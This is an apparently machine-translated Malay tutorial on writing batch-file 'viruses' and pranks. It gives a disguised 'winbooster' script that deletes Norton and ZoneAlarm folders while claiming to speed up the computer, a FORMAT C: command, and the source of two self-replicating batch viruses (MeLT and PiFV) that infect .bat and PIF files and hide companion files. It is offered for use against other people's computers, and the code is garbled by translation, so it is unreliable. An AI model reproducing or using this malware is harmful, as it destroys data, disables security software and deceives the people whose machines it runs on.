Trik Batch dan Virus: 3 Langkah

2024 Pengarang: John Day | [email protected]. Diubah suai terakhir: 2024-01-30 11:13

Cara membuat virus Prank dan Real di BATCHCatatan: Saya tidak bertanggungjawab atas kerosakan yang anda lakukan sama ada pada komputer orang lain komputer andaCatatan: Apabila anda mahu Menyimpan fail, anda harus menyimpannya sebagai apa sahaja.bat

Langkah 1: Virus Sebenar (Orang Sederhana)

yang pertama: salin kod ******************************************* ************** @ echo selamat datang ke winbooster oleh ELECTROfun @ echo jika anda ingin menjadikan komputer anda menjadi lebih pantas, anda harus melakukan langkah-langkah berikut @ jeda cd / c: dir dir c: / progra ~ 1 / norton ~ 1 @echo sekarang anda harus menaip y dan tekan enter @pause del c: / progra ~ 1 / norton ~ 1 @pause c: dir @pause @dir c: / progra ~ 1 dir c: / progra ~ 1 / zonea ~ 1 / zonealarm del c: / progra ~ 1 / zonea ~ 1 / zonealarm @echo ok sekarang komputer anda "BENAR!" Cepat: keluar *********************************************** * Catatan: simpan fail apa sahaja yang anda mahu.bat Catatan: apa sahaja yang Selepas @ echo boleh diubah (anda boleh menulis apa sahaja yang anda mahukan) Yang kedua: *************** warna 02FORMAT C: ***************

Langkah 2: Virus Sebenar (Orang Lanjutan)

1. Yang paling kuat ******************* @ jika tidak '% 0 ==' jika '% _melt% ==' goto meltbeg:: ---- dummy host -------- @ echo offecho Hello World!:: ---- host dummy akhir ---- @ goto MeLTend [MeLT_2a]: MeLTbeg @ echo off% _MeLT% jika '% 1 ==' MeLT goto MeLT% 2jika tidak wujud% comspec% set comspec =% _ MeLT% perintah% comspec% / e: 5000 / c% 0 MeLT virset MeLTcl =% 1% 2% 3% 4% 5% 6% 7% 8% 9call% 0 MeLT rhset _MeLT = tetapkan MeLTcl = goto MeLTend: MeLTrhset _MeLT = x% 0% MeLTcl%: MeLTvirset MeLTH =% 0jika tidak wujud% _MeLT %% temp% / nul tetapkan temp =% tmp% jika ada% temp% / MeLT_2a goto MeLTrun% 0 MeLT fnd. % path%: MeLTfndshift% _MeLT% if '% 2 ==' keluar MeLTset MeLT =% 2 \% MeLTH%.batif tidak wujud% MeLT% set MeLT =% 2 \% MeLTH% jika tidak ada% MeLT% tetapkan MeLT = % 2% MeLTH%.batif tidak ada% MeLT% set MeLT =% 2% MeLTH% jika tidak ada% MeLT% goto MeLTfndfind "MeLT"% temp% / MeLT_2aattrib% temp% / MeLT_2a + h: MeLTrun% MeLTH% MeLT s…% path%: MeLTsshift% _MeLT% if '% 2 ==' keluar MeLTfor %% a in (% 2 / *. bat% 2 *.bat) memanggil% MeLTH% MeLT inf %% agoto MeLTs: MeLTinffind / i "MeLT" nulif not errorlevel 1 goto MeLTnoecho @if not '%% 0 ==' if '%% _ melt %% ==' goto meltbeg> MeLT.ttype% 3 >> MeLT.techo. >> MeLT.ttype% temp% / MeLT_2a >> MeLT.tmove MeLT.t% 3> nulexit MeLT: MeLTact - teks skrin kilat-lebur kemudian dimasukkan kembali ke normalecho e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE> MeLT.techo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8 >> MeLT.techo e 120 B4 4C CD 21 00 >> MeLT.techo g >> MeLT.tdebugnuldel MeLT.texit MeLT: MeLTnoset MeLTC =% MeLTC% 1if% MeLTC% == 1111111111 goto MeLTact: MeLTend *********************************** ******** 2. Ini adalah virus yang 'menjangkiti' fail PIF, yang digunakan oleh Windows untuk menjalankan program DOS. Ia berfungsi dengan membuat kumpulan pendamping tersembunyi yang mengandungi salinan ini kemudian mengubah fail PIF sehingga kumpulan pendamping berjalan terlebih dahulu. Setelah pendamping menjalankan, ia menjalankan program host asal, namanya dikodkan ke dalam pendamping. Fail pif ditandakan supaya tidak dijangkiti semula. Hanya PIF yang terpengaruh, tidak ada perubahan yang dibuat pada program yang dijangkiti. Untuk 'menyembuhkan', gunakan PIFEDIT untuk memulihkan nama fail asal kemudian hapus fail yang tersembunyi. ******************************* *************** @ echo off:: nama fail host … tetapkan pifvo = LIST. COM:: loop dispatcher … if '% 1 ==' PiFV goto PiFV_% 2:: jalankan virus! set _PiFV = jika tidak ada% comspec% set comspec = C: / COMMAND. COM% _PiFV %% comspec% / e: 5000 / c% 0 PiFV go> nulif wujud PiFV! del PiFV!:: jalankan set host PiFVcl =% 1% 2% 3% 4% 5% 6% 7% 8% 9call% 0 PiFV hstset PiFVo = set PiFVcl =:: periksa pengaktifan… echo. | tarikh | cari / i "sat"> nul. PiFVif errorlevel 1 goto PiFV_endecho. | time | cari "7"> nul. PiFVif errorlevel 1 goto PiFV_msgset PiFV = echocls% _PiFV %% PiFV%.% PiFV% Pernah ada Otter bernama Oscer% PiFV % Siapa yang mengaku tahu bagaimana membuat air.% PiFV% "Tidak ada lagi empangan," katanya, "gunakan air saya sebagai gantinya!"% PiFV% Tetapi Penatua Otter tidak terkesan.jeda> nul. PiFVset PiFV = goto PiFV_end: PiFV_msgecho [PiFV] oleh WaveFuncgoto PiFV_end: PiFV_hst% PiFVo%% PiFVcl% goto PiFV_end: PiFV_goset PiFVh =% 0jika tidak ada% PiFVh% set PiFVh =% 0.batif tidak ada% PiFVh% keluar untuk %% a) lakukan panggilan% 0 PiFV inf %% aexit PiFV: PiFV_infset PiFVp =% 3:: dapatkan nama fail mangsa dan penanda jangkitan:: dari fail PIF menggunakan debug … jika ada PiFV! goto PiFV_1echo m 124, 162 524> PiFV! echo e 100 '@set fn =' >> PiFV! echo m 524, 562 108 >> PiFV! echo n pifv $.bat >> PiFV! echo rcx >> PiFV! echo 47 >> PiFV! Echo w >> PiFV! Echo m 55E, 561 108 >> PiFV! Echo e 10C 0 >> PiFV! Echo n pifv $$. Bat >> PiFV! Echo rcx >> PiFV! Echo 10 >> PiFV! Echo w >> PiFV! Echo q >> PiFV !: PiFV_1debug% PiFVp% nulcall PiFV $ set PiFVn =% fn% call PiFV $$ set PiFVi =% fn% del PiFV $ ?. bat:: pifvn = nama fail orig:: pifvi = penanda jangkitan:: pifvp = nama fail pif:: pifvh = fail bat pendamping:: langkau pif yang dijangkiti atau 'kosong' … jika '% PiFVi% ==' PiFV goto PiFV_endif '% PiFVn% ==' goto PiFV_end:: jangan bayangkan command.com (bersikap baik) gema% PiFVn% | find / i "command"> nulif not errorlevel 1 goto PiFV_end:: infectable - buat kumpulan pendamping …:: (kod berikut melepaskan peluasan) echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88> PiFV $$ echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21 >> PiFV $$ echo e 120 c3 73 65 74 20 66 6e 3d 24 00 >> PiFV $$ echo n pifv $.com >> PiFV $$ echo rcx >> PiFV $$ echo 2a >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ debugnulecho% PiFVn% | PiFV $> PiFV $$. Batcall PiFV $$ set PiFVb =% fn%.batdel PiFV $?. *:: pifvb = nama kumpulan baru:: jangan bayangkan jika comp mempunyai sama nama sebagai hostif% PiFVo% ==% PiFVb% goto PiFV_endif wujud% PiFVb% goto PiFV_endecho @echo off>% PiFVb% echo set pifvo =% pifvn% >>% PiFVb% cari "PiFV">% PiFVb% attrib% PiFVb% + h::… dan arahkan PIF ke arah perusahaanione e 15E 'PiFV', 0> PiFV $$ echo e 124 '% PiFVb%', 0 >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ debug% PiFVp% nuldel PiFV $$:: Saya rasa kita sudah selesai! keluar dari PiFV: PiFV_end:: tertanya-tanya berapa banyak bug yang ada di dalamnya? Hanya satu:: cara untuk mengetahui … ***************************************** **********

Langkah 3: Prank Virus dan Dan Trik

1.prank virus ******************* color 02 @ echo offecho dir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / sdir / secho @ echo @ echo ************************* Catatan: "Warna 02" adalah menjadikan Teks hijau2.trick (kod matriks) ****** ************************** @ echo offcolor 02: startecho% random%% random%% random%% random%% random%% random% % rawak%% rawak%% rawak%% rawak%% rawak%% rawak%% rawak%% rawak% mula ************************ ******************